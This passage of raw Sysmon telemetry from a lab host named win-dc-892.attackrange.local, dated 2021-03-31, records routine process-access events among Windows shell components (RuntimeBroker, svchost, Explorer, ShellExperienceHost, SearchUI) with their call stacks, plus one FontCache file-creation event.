ll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245912C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+b8fc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245888C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49243732C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49243480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.184{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.184{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.153{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+c370|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.137{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+7e00|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.137{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000006511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.137{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-S-1-5-21-4055678433-3894535204-3898404691-500.dat2021-03-31 12:02:30.137 10341000x80000000000000006510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.137{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.137{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.137{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.137{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+18a6c|C:\Windows\SYSTEM32\psmserviceexthost.dll+e44e|C:\Windows\SYSTEM32\psmserviceexthost.dll+e4e7|C:\Windows\SYSTEM32\psmserviceexthost.dll+e1f2|C:\Windows\SYSTEM32\psmserviceexthost.dll+18e38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+567e1|C:\Windows\System32\combase.dll+56e0d 10341000x80000000000000006503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+567e1|C:\Windows\System32\combase.dll+56e0d 10341000x80000000000000006502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+83c5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7b9c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7b3b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8749|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ae6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshel